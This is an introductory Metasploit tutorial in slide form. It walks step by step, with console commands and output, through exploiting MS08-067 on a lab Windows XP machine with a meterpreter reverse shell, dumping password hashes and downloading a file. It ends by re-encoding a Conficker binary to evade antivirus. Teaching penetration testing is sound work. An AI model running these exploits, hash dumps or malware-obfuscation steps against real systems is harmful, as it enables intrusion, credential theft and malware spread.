Metasploit 101

By: Metacortex
For:

Audience:
- People who haven't used metasploit before or
know what it is
- People looking to maybe learn some new
features of metasploit
- Nubs

What is Metasploit?
Metasploit is an exploitation framework. It is an
all in one toolkit for everything pentesters,
researchers, and exploit developers need.
Written in Ruby
Open Source
Highly extensible and customizable
Originally written by HD Moore
Maintained by Rapid7 Developers

Getting Metasploit
Best way to get a hold of it is to grab it off SVN
Available already installed in BackTrack
Can download pre packaged versions

Linux Prerequisites
To run Metasploit, you need Ruby and
Rubygems.
dc@801:~/metasploit$ sudo aptitude install ruby rubygems
The following NEW packages will be installed:
libruby1.8{a} ruby ruby1.8{a} ruby1.8-dev{a} rubygems
rubygems1.8{a}
0 packages upgraded, 6 newly installed, 0 to remove and 0 not
upgraded.
Need to get 2,622 kB of archives. After unpacking 11.0 MB will be
used.
Do you want to continue? [Y/n/?] y

SVN Download
dc@801:~/metasploit$ svn co https://www.metasploit.com/svn/framework3/trunk/
A trunk/msfelfscan
A trunk/scripts
A trunk/scripts/ps
A trunk/scripts/ps/msflag.ps1
A trunk/scripts/resource
...
A trunk/documentation/rpm
A trunk/documentation/rpm/metasploit.spec
U trunk
Checked out revision 15702.

SVN Update
dc@801:~/metasploit/trunk$ svn update
U external/source/meterpreter/source/extensions/priv/server/priv.c
U external/source/meterpreter/source/extensions/stdapi/server/stdapi.c
U external/source/meterpreter/source/extensions/stdapi/server/net/config/interface.c
...
U HACKING
D documentation/users_guide.pdf
A documentation/Gemfile
A documentation/users_guide_4.2.pdf
A documentation/users_guide_4.3.pdf
Updated to revision 15703.

Download binaries
Do that at
http://www.metasploit.com/download/

What do you get?

dc@801:~/metasploit/trunk$ ls
armitage
HACKING msfd
msfpescan plugins tools
COPYING lib
msfelfscan msfrop README.md
data
modules
msfencode msfrpc scripts
documentation msfbinscan msfgui
msfrpcd spec
external
msfcli msfmachscan msfupdate test
Gemfile
msfconsole msfpayload msfvenom THIRDPARTY.md

A whole lot of stuff

msfconsole
dc@801:~/metasploit/trunk$ ls
armitage
HACKING msfd
msfpescan plugins tools
COPYING lib
msfelfscan msfrop README.md
data
modules
msfencode msfrpc scripts
documentation msfbinscan msfgui
msfrpcd spec
external
msfcli msfmachscan msfupdate test
Gemfile
msfconsole msfpayload msfvenom THIRDPARTY.md

But we are really interested in msfconsole

msfconsole
dc@801:~/metasploit/trunk$ sudo ./msfconsole
[sudo] password for dc:
,
,
/
\
((__---,,,---__))
(_) O O (_)_______
\_/
|\
o_o \ M S F | \
\ _____ | *
||| WW|||
|||
|||

=[ metasploit v4.4.0-release [core:4.4 api:1.0]

+ -- --=[ 922 exploits - 496 auxiliary - 150 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
=[ svn r15704 updated today (2012.08.04)
msf >

msfconsole help
msf > help
Core Commands
=============
Command
------?
back
banner
cd
color
connect
exit
help
info
irb
jobs
...

Description
----------Help menu
Move back from the current context
Display an awesome metasploit banner
Change the current working directory
Toggle color
Communicate with a host
Exit the console
Help menu
Displays information about one or more module
Drop into irb scripting mode
Displays and manages jobs

msfconsole search
msf > search ms08_067
Matching Modules
================
Name
Disclosure Date Rank Description
------------------ ---- ----------exploit/windows/smb/ms08_067_netapi 2008-10-28
great Microsoft Server Service
Relative Path Stack Corruption

Nmap
msf > nmap -A 192.168.0.107
[*] exec: nmap -A 192.168.0.107

Starting Nmap 5.21 ( http://nmap.org ) at 2012-08-04 00:51 MDT

Nmap scan report for 192.168.0.107
Host is up (0.00033s latency).
Not shown: 997 closed ports
PORT
STATE SERVICE
VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:35:04:D6 (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop
Service Info: OS: Windows

Exploits and Payloads

Exploit: Code that leverages a certain vulnerability
Payload: Code that gets placed on the system post
exploitation

Selecting an Exploit
Once you have identified a vulnerability that has an
exploit in metasploit, lets go ahead and use it.
In this example, we are going against a fresh instal
of Windows XP SP2
XP SP2 is notorious for MS08-067 (the bug conficker
used)
The MS08-067 is a super reliable
exploit so we will use it

Exploit Options
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name
Current Setting
-----------------RHOST
RPORT 445
SMBPIPE BROWSER

Exploit target:
Id Name
-- ---0 Automatic Targeting

Required Description
-----------------yes
The target address
yes
Set the SMB service port
yes
The pipe name to use (BROWSER, SRVSVC)

Available Payloads
msf exploit(ms08_067_netapi) > show payloads
Compatible Payloads
===================
Name
Disclosure Date Rank Description
------------------ ---- ----------generic/custom
normal Custom Payload
generic/debug_trap
normal Generic x86 Debug Trap
generic/shell_bind_tcp
...
Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp
normal VNC Server (Reflective
Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports
normal VNC Server (Reflective
Injection), Reverse All-Port TCP Stager

Select Payload
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

Show Exploit Options

msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name
Current Setting Required Description
----------------------------------RHOST
yes The target address
RPORT 445
yes Set the SMB service port
SMBPIPE BROWSER
yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name
Current Setting Required Description
----------------------------------EXITFUNC thread
yes Exit technique: process, none, seh, thread
LHOST
yes The listen address
LPORT 4444
yes The listen port
Exploit target:
Id Name
-- ---0 Automatic Targeting

Set Exploit Options

msf exploit(ms08_067_netapi) > set RHOST 192.168.0.107
RHOST => 192.168.0.107
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.101
LHOST => 192.168.0.101
msf exploit(ms08_067_netapi) > show options

Verify Options
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name
Current Setting Required Description
----------------------------------RHOST 192.168.0.107 yes The target address
RPORT 445
yes Set the SMB service port
SMBPIPE BROWSER
yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name
Current Setting Required Description
----------------------------------EXITFUNC thread
yes Exit technique: process, none, seh, thread
LHOST 192.168.0.101 yes The listen address
LPORT 4444
yes The listen port
Exploit target:
Id Name
-- ---0 Automatic Targeting

EXPLOIT!
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.0.101:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.0.107
[*] Meterpreter session 1 opened (192.168.0.101:4444 -> 192.168.0.107:1041) at Sat Aug
04 00:43:16 -0600 2012
meterpreter >

Basic Meterpreter
meterpreter > ifconfig
Interface 1
============
Name
: MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU
: 1520
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
Interface 2
============
Name
: AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC : 08:00:27:35:04:d6
MTU
: 1500
IPv4 Address : 192.168.0.107
IPv4 Netmask : 255.255.255.0
Interface 2
============
Name
: AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC : 08:00:27:35:04:d6
MTU
: 1500
IPv4 Address : 192.168.0.107
IPv4 Netmask : 255.255.255.0

Basic Meterpreter
meterpreter > hashdump
Administrator:500:52b7bd1c19ac445baad3b435b51404ee:d04b083dd7cbadb1f6abbca2d64222a5:::
dc801-1:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:acdfc6045fe025a3618e54ed631edee9:919ec17846e9c0392ff21e5f93eb60d4:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:
2a19baf0800172a7622217c273064e3a:::

Basic Meterpreter
meterpreter > search -f *credit*
Found 2 results...
c:\\Documents and Settings\dc801-1\Desktop\CreditCardData.txt (16 bytes)
c:\\Documents and Settings\dc801-1\Recent\CreditCardData.lnk (519 bytes)
meterpreter > cd C:\\
meterpreter > cd Documents\ and\ Settings
meterpreter > cd dc801-1
meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Documents and Settings\dc801-1\Desktop
==================================================
Mode
Size Type Last modified
Name
------- ---- ---------------40777/rwxrwxrwx 0 dir Sun Aug 05 13:07:32 -0600 2012 .
40777/rwxrwxrwx 0 dir Sat Aug 04 00:18:30 -0600 2012 ..
100666/rw-rw-rw- 16 fil Sun Aug 05 13:08:20 -0600 2012 CreditCardData.txt
meterpreter > download CreditCardData.txt
[*] downloading: CreditCardData.txt -> CreditCardData.txt
[*] downloaded : CreditCardData.txt -> CreditCardData.txt

Basic Meterpreter
dc@801:~/metasploit/trunk$ ls
armitage
HACKING msfelfscan msfrpc
spec
COPYING
lib
msfencode msfrpcd
test
CreditCardData.txt modules
msfgui
msfupdate THIRD-PARTY.md
data
msfbinscan msfmachscan msfvenom tools
documentation msfcli
msfpayload plugins
external
msfconsole msfpescan
README.md
Gemfile
msfd
msfrop
scripts
dc@801:~/metasploit/trunk$ cat CreditCardData.txt
not really. lulz
dc@801:~/metasploit/trunk$

MSFEncode

MSFEncode
dc@801:~/metasploit/trunk$ ./msfencode -i conficker.EXE -o notconficker.exe -e x86/shikata_ga_nai -c 10
[*] x86/shikata_ga_nai succeeded with size 86045 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 86074 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 86103 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 86132 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 86161 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 86190 (iteration=6)
[*] x86/shikata_ga_nai succeeded with size 86219 (iteration=7)
[*] x86/shikata_ga_nai succeeded with size 86248 (iteration=8)
[*] x86/shikata_ga_nai succeeded with size 86277 (iteration=9)
[*] x86/shikata_ga_nai succeeded with size 86306 (iteration=10)

MSFEncode file size jump

dc@801:~/metasploit/trunk$ ls -alh *conficker*
-rw-r--r-- 1 dc dc 84K 2012-08-29 13:23 conficker.EXE
-rw-r--r-- 1 dc dc 368K 2012-08-29 13:30 notconficker.exe

MSFEncode